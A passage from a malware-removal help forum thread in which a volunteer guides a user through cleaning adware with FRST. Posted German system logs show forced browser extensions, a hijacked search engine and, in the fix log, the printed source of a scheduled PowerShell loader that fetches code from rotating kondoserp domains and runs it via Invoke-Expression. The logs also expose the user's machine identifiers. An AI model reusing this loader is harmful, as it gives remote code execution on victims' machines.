Erkennungszeit: 2024-07-20T12:46:03.035Z Benutzer: SKYSGAMINGPC-CA\skysc Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe Sicherheitsversion: 1.415.174.0 Modulversion: 1.1.24060.5 Produktversion: 4.18.24060.7 Date: 2024-07-18 16:35:41 Description: Der überwachte Ordnerzugriff hat C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe daran gehindert, Änderungen am Speicher durchzuführen. Erkennungszeit: 2024-07-18T14:35:41.601Z Benutzer: NT-AUTORITÄT\SYSTEM Pfad: \Device\HarddiskVolume3 Name des Prozesses: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe Sicherheitsversion: 1.415.150.0 Modulversion: 1.1.24060.5 Produktversion: 4.18.24060.7 Event[0] Date: 2024-07-15 17:37:29 Description: Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features. Feature: Bei Zugriff Fehlercode: 0x8007043c Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden. Ursache: Die Antischadsoft-Sicherheitsfunktion wurde aus unbekanntem Grund beendet. Möglicherweise kann das Problem durch einen Neustart des Diensts behoben werden. Date: 2024-06-16 16:43:01 Description: Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features. Feature: Verhaltensüberwachung Fehlercode: 0x80070002 Fehlerbeschreibung: Das System kann die angegebene Datei nicht finden. Ursache: Der Filtertreiber benötigt eine aktuelles Modul. Sie müssen die neuesten Updates der Sicherheitsinformationen installieren, um Echtzeitschutz zu gewährleisten. Date: 2024-06-15 22:05:17 Description: Fehler des Microsoft Defender Antivirus-Echtzeitschutz-Features. Feature: Netzwerkinspektionssystem Fehlercode: 0x8007045b Fehlerbeschreibung: Der Computer wird heruntergefahren. Ursache: Dem System fehlen erforderliche Updates zum Ausführen des Netzwerkinspektionssystems. Installieren Sie die erforderlichen Updates, und starten Sie das Gerät neu. 
Date: 2024-06-13 18:06:16 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren. Security Intelligence versucht: Sicherung Fehlercode: 0x80004004 Fehlerbeschreibung: Vorgang abgebrochen Security Intelligence-Version: 1.413.76.0;1.413.76.0 Modulversion: 1.1.24050.5 Date: 2024-06-13 18:06:16 Description: Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Security Intelligence aufgetreten. Es wird versucht, zu einer vorherigen Version zurückzukehren. Security Intelligence versucht: Aktuell Fehlercode: 0x80501102 Fehlerbeschreibung: Unerwartetes Problem. Installieren Sie bei Bedarf verfügbare Updates, und starten Sie das Programm dann erneut. Informationen zum Installieren von Updates finden Sie unter "Hilfe und Support". Security Intelligence-Version: 1.413.266.0;1.413.266.0 Modulversion: 1.1.24050.5 CodeIntegrity: =============== Date: 2024-07-22 21:19:08 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2024-07-22 20:56:26 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Speicherinformationen =========================== BIOS: American Megatrends International, LLC. A.B0 08/11/2022 Hauptplatine: Micro-Star International Co., Ltd. 
B550-A PRO (MS-7C56) Prozessor: AMD Ryzen 7 5800X 8-Core Processor Prozentuale Nutzung des RAM: 38% Installierter physikalischer RAM: 32694.09 MB Verfügbarer physikalischer RAM: 20043.84 MB Summe virtueller Speicher: 43446.09 MB Verfügbarer virtueller Speicher: 26378.02 MB ==================== Laufwerke ================================ Drive c: (Windows) (Fixed) (Total:1906.64 GB) (Free:43.73 GB) (Model: TEAM TM8FPD002T) NTFS \\?\Volume{41e7a2f5-393b-493b-be00-74394b7a817d}\ (Recovery tools) (Fixed) (Total:0.98 GB) (Free:0.32 GB) NTFS \\?\Volume{7b3d089e-4810-4004-aca0-af67060b3ad4}\ (SYSTEM) (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32 ==================== MBR & Partitionstabelle ==================== ========================================================== Disk: 0 (Size: 1907.7 GB) (Disk ID: BDAE7615) Partition: GPT. ==================== Ende von Addition.txt ======================= |
23.07.2024, 13:48 | #3 |
/// TB-Ausbilder | My name is Matthias and I will help you analyze and clean up your system. I am analyzing your log files and will get back to you shortly. |
23.07.2024, 14:04 | #4 |
/// TB-Ausbilder | Your system is infected with new adware/PUP, no cause for concern. We will take care of it. We begin with a repair using FRST. This can take a few minutes, please be patient. Step 1 WARNING TO ALL READERS!!! This FRST script is intended exclusively for this user and should never be used 1:1 on another system!
Step 2 Step 1 created a .zip archive on your desktop, named according to the scheme < Date_Time.zip > (e.g. 20.02.2024_11.33.52.zip).
|
23.07.2024, 14:38 | #5 |
| After the "repair" with FRST, a restart was required. The "Managed by your organization" messages in Edge and Chrome have disappeared. PS: I have uploaded the archive. Fixlog: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 21.07.2024 durchgeführt von skysc (23-07-2024 15:16:54) Run:1 Gestartet von C:\Users\skysc\Downloads\Neuer Ordner Geladene Profile: skysc & zweisky Start-Modus: Normal ============================================== fixlist Inhalt: ***************** Start:: CreateRestorePoint: CloseProcesses: AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [3952] SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> DefaultScope {748F61FA-2044-4035-AAD3-7322004BAF23} URL = SearchScopes: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001 -> {748F61FA-2044-4035-AAD3-7322004BAF23} URL = Toolbar: HKLM-x32 - Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Keine Datei HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [] => [X] HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (Keine Datei) HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_23_5] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.23.5" (Keine Datei) Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Keine Datei) Task: {4BD989F5-A0B9-437E-81EE-C28C6C688B44} - System32\Tasks\MSI_GamebarConnect => "C:\Program Files (x86)\MSI\MSI Companion\Gamebar_Connect.exe" -run (Keine Datei) Task: {70F898CB-5077-4047-A303-A8EBC1F66A90} - System32\Tasks\MSI_TraceFPS => "C:\Program Files (x86)\MSI\MSI Companion\MSI_TraceFPS.exe" (Keine Datei) S2 DFWSIDService; C:\ProgramData\Wondershare\wsServices\WsidService.exe [X] S2 ElevationService; C:\ProgramData\Wondershare\wsServices\ElevationService.exe [X] S4 EsgShKernel; "C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe" [X] S2 ShMonitor; "C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe" [X] 
C:\Program Files\EnigmaSoft S2 WirelessBackupService; C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Basic - Deutsch\Addins\Recovery\WirelessBackupService.exe [X] S2 Wondershare InstallAssist; C:\ProgramData\Wondershare\Service\InstallAssistService.exe [X] 2023-08-14 18:17 - 2023-08-14 18:17 - 000005998 _____ () C:\Users\skysc\AppData\Local\91094746112 2024-04-06 15:56 - 2024-04-06 15:56 - 000005998 _____ () C:\Users\skysc\AppData\Local\93293858673 2023-10-13 15:29 - 2023-10-13 15:29 - 000005998 _____ () C:\Users\skysc\AppData\Local\9437468409 CMD: type "C:\Windows\System32\KondSerp_Optimizer.ps1" Task: {7FE0D883-DA2A-4259-AA1B-F2D690708800} - System32\Tasks\KondSerp_OptimizerV2 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [450560 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -File C:/Windows/System32/KondSerp_Optimizer.ps1 <==== ACHTUNG C:\Windows\System32\KondSerp_Optimizer.ps1 Reg: reg query "HKLM\SOFTWARE\Policies\Google" /S Reg: reg query "HKLM\SOFTWARE\Policies\Microsoft\Edge" /S HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG Task: {8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32} - System32\Tasks\SEO => C:\Users\skysc\AppData\Roaming\SEO\SEO.exe (Keine Datei) <==== ACHTUNG C:\Users\skysc\AppData\Roaming\SEO C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html" Edge NewTab: Profile 1 -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html" C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji CHR DefaultSearchURL: Default -> hxxps://qtrsearch.com/search?q={searchTerms}&s=rg&u=%USERID% CHR DefaultSearchKeyword: Default -> qtr CHR DefaultSuggestURL: Default -> hxxps://qtrsearch.com/suggest?q={searchTerms} CMD: cscript /nologo 
%systemroot%\System32\slmgr.vbs /dlv CMD: netsh winsock reset CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: netsh winhttp reset proxy CMD: Bitsadmin /Reset /Allusers CMD: Winmgmt /salvagerepository CMD: Winmgmt /verifyrepository CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R Hosts: RemoveProxy: Zip: C:\FRST\Quarantine EmptyTemp: End:: ***************** CreateRestorePoint: Fehler(1=2%) -> Erstellen eines Wiederherstellungspunktes gescheitert. Prozesse erfolgreich geschlossen. C:\Users\Public\Shared Files => ":VersionCache" ADS erfolgreich entfernt "HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{748F61FA-2044-4035-AAD3-7322004BAF23} => erfolgreich entfernt "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => erfolgreich entfernt HKLM\Software\Wow6432Node\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => konnte nicht entfernt werden. Zugriff verweigert. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt "HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\Software\Microsoft\Windows\CurrentVersion\Run\\" => erfolgreich entfernt "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Norton Download ManagerFORCE_UPGRADE_22_22_9" => erfolgreich entfernt "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\Norton Download ManagerFORCE_UPGRADE_22_23_5" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0F10DCF-44AD-40E8-9370-FB5DA59F93FB}" => erfolgreich entfernt C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4BD989F5-A0B9-437E-81EE-C28C6C688B44}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BD989F5-A0B9-437E-81EE-C28C6C688B44}" => erfolgreich entfernt C:\Windows\System32\Tasks\MSI_GamebarConnect => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI_GamebarConnect" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{70F898CB-5077-4047-A303-A8EBC1F66A90}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70F898CB-5077-4047-A303-A8EBC1F66A90}" => erfolgreich entfernt C:\Windows\System32\Tasks\MSI_TraceFPS => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI_TraceFPS" => 
erfolgreich entfernt HKLM\System\CurrentControlSet\Services\DFWSIDService => erfolgreich entfernt DFWSIDService => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\ElevationService => erfolgreich entfernt ElevationService => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\EsgShKernel => erfolgreich entfernt EsgShKernel => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\ShMonitor => erfolgreich entfernt ShMonitor => Dienst erfolgreich entfernt "C:\Program Files\EnigmaSoft" => nicht gefunden HKLM\System\CurrentControlSet\Services\WirelessBackupService => erfolgreich entfernt WirelessBackupService => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\Wondershare InstallAssist => erfolgreich entfernt Wondershare InstallAssist => Dienst erfolgreich entfernt C:\Users\skysc\AppData\Local\91094746112 => erfolgreich verschoben C:\Users\skysc\AppData\Local\93293858673 => erfolgreich verschoben C:\Users\skysc\AppData\Local\9437468409 => erfolgreich verschoben ========= type "C:\Windows\System32\KondSerp_Optimizer.ps1" ========= [System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions") $uid = '595e4c38-2e42-48d5-ba6f-2d886dd8e00e'; $wc = New-Object system.Net.WebClient; $randomDelay = Get-Random -Minimum 0 -Maximum 51 Start-Sleep -Seconds $randomDelay $services = '' $base = "kondoserp1" foreach ($i in 0..25) { $suffix = [char]([int][char]'a' + $i) $domain = "$base$suffix.com" if ($i -eq 0) { $domain = "$base.com" } $domain try { $url = "https://$domain/updaterTask/$uid" $services = $wc.downloadString($url).Trim() break } catch { } } Invoke-Expression $services; ========= Ende von CMD: ========= "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7FE0D883-DA2A-4259-AA1B-F2D690708800}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7FE0D883-DA2A-4259-AA1B-F2D690708800}" => erfolgreich entfernt 
C:\Windows\System32\Tasks\KondSerp_OptimizerV2 => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KondSerp_OptimizerV2" => erfolgreich entfernt C:\Windows\System32\KondSerp_Optimizer.ps1 => erfolgreich verschoben ========= reg query "HKLM\SOFTWARE\Policies\Google" /S ========= HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist 2 REG_SZ gdamghfpmkabflbpldhdpbbfofolgaji;https://clients2.google.com/service/update2/crx ========= Ende von Reg: ========= ========= reg query "HKLM\SOFTWARE\Policies\Microsoft\Edge" /S ========= HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist 2 REG_SZ fepbfegljfpfclgajmjlmnhdillncgke;https://edge.microsoft.com/extensionwebstorebase/v1/crx ========= Ende von Reg: ========= HKLM\SOFTWARE\Policies\Google => erfolgreich entfernt HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8B4CA8A8-BDAC-4447-9FE7-4ABA29333A32}" => erfolgreich entfernt C:\Windows\System32\Tasks\SEO => erfolgreich verschoben "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SEO" => erfolgreich entfernt "C:\Users\skysc\AppData\Roaming\SEO" => nicht gefunden "C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke" Ordner verschieben: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\fepbfegljfpfclgajmjlmnhdillncgke => erfolgreich verschoben "NewTab" => nicht gefunden "NewTab" => nicht gefunden "C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji" Ordner verschieben: C:\Users\skysc\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\gdamghfpmkabflbpldhdpbbfofolgaji => erfolgreich verschoben "Chrome DefaultSearchURL" => erfolgreich entfernt "Chrome DefaultSearchKeyword" => erfolgreich entfernt "Chrome DefaultSuggestURL" => erfolgreich entfernt ========= cscript /nologo %systemroot%\System32\slmgr.vbs /dlv ========= Softwarelizenzierungsdienst-Version: 10.0.22621.3880 Name: Windows(R), Core edition Beschreibung: Windows(R) Operating System, RETAIL channel Aktivierungs-ID: 2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8 Anwendungs-ID: 55c92734-d682-4d71-983e-d6ec3f16059f Erweiterte PID: 03612-03261-000-000000-00-1031-22621.0000-1732022 Product Key-Kanal: Retail Installations-ID: 075996267584201613853913300654863666871364796794687444903607682 Lizenz-URL verwenden: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail URL fr die šberprfung: https://validation-v2.sls.microsoft.com/SLWGA/slwga.asmx Teil-Product Key: 8HVX7 Lizenzstatus: Lizenziert Verbleibende Windows Rearm-Anzahl: 999 Verbleibende SKU Rearm-Anzahl: 999 Vertrauenswrdige Zeit: 23.07.2024 15:16:59 ========= Ende von CMD: ========= ========= netsh winsock reset ========= Der Winsock-Katalog wurde zurckgesetzt. Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen. ========= Ende von CMD: ========= ========= netsh advfirewall reset ========= OK. ========= Ende von CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= OK. ========= Ende von CMD: ========= ========= netsh winhttp reset proxy ========= Aktuelle WinHTTP-Proxyeinstellungen: DirectAccess (kein Proxyserver). ========= Ende von CMD: ========= ========= Bitsadmin /Reset /Allusers ========= BITSADMIN version 3.0 BITS administration utility. (C) Copyright Microsoft Corp. {24712D51-0265-4DD1-9A9F-10D85D234EB2} canceled. {C04FB904-E1E2-4F4A-85B0-A424A3DCD441} canceled. 2 out of 2 jobs canceled. 
========= Ende von CMD: ========= ========= Winmgmt /salvagerepository ========= Das WMI-Repository ist konsistent. ========= Ende von CMD: ========= ========= Winmgmt /verifyrepository ========= Das WMI-Repository ist konsistent. ========= Ende von CMD: ========= ========= "%WINDIR%\SYSTEM32\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SysWOW64\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SYSTEM32\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= ========= "%WINDIR%\SysWOW64\lodctr.exe" /R ========= Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden. ========= Ende von CMD: ========= C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben Hosts erfolgreich wiederhergestellt. 
========= RemoveProxy: ========= "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt "HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt "HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt ========= Ende von RemoveProxy: ========= ================== Zip: =================== C:\FRST\Quarantine -> erfolgreich kopiert zu C:\Users\skysc\Desktop\23.07.2024_15.17.12.zip =========== Zip: Ende =========== =========== EmptyTemp: ========== FlushDNS => abgeschlossen BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 1865877967 B Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 1007539846 B Windows/system/drivers => 83782042 B Edge => 0 B Chrome => 7019904 B Brave => 30143246 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B ProgramData => 0 B Public => 0 B systemprofile => 540235839 B systemprofile32 => 540236976 B LocalService => 543039313 B NetworkService => 543321409 B skysc => 3881722265 B zweisky => 3881746231 B RecycleBin => 10107860 B EmptyTemp: => 12 GB temporäre Dateien entfernt. 
================================ Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 23-07-2024 15:30:53) Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart: HKLM\Software\Wow6432Node\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => konnte nicht entfernt werden. Zugriff verweigert. ==== Ende vom Fixlog 15:30:53 ==== |
23.07.2024, 20:16 | #6 |
/// TB-Ausbilder | Well done. Now please run one more check with FRST and with SecurityCheck. Step 1
Step 2 Run SecurityCheck (SC) according to the illustrated instructions and add the log file as an attachment. |
24.07.2024, 21:10 | #7 |
| Thank you already for the help. FRST Log: FRST Logfile: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 24.07.2024 durchgeführt von skysc (Administrator) auf SKYSGAMINGPC-CA (Micro-Star International Co., Ltd. MS-7C56) (24-07-2024 22:01:03) Gestartet von C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe Geladene Profile: skysc Plattform: Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) Sprache: Deutsch (Deutschland) Standard-Browser: Edge Start-Modus: Normal ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (A225F3B5-240D-4EE9-BCF4-697A07F5E93E -> Micro-Star INT'L CO., LTD.) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p\DCv2\DCv2.exe (Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler.exe (Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler64.exe (C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Engine\CC_Engine_x64.exe (C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) 
C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.256.0.2\OverwolfHelper.exe (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.256.0.2\OverwolfHelper64.exe (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.256.0.2\OverwolfBrowser.exe <4> (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Users\skysc\AppData\Local\Overwolf\ProcessCache\0.256.0.2\cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj\curseforge.exe (C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> (C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3> (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.AlwaysOnTop.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.Awake.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.ColorPickerUI.exe (C:\Program 
Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.CropAndLock.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\WinUI3Apps\PowerToys.Peek.UI.exe (C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.113\msedgewebview2.exe <6> (C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDrive.exe (explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <8> (Opera Norway AS -> Opera Software) C:\Users\skysc\AppData\Local\Programs\Opera GX\109.0.5097.142\opera_autoupdate.exe <2> (SearchFilterHost.exe ->) (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (services.exe ->) (Malwarebytes Inc. 
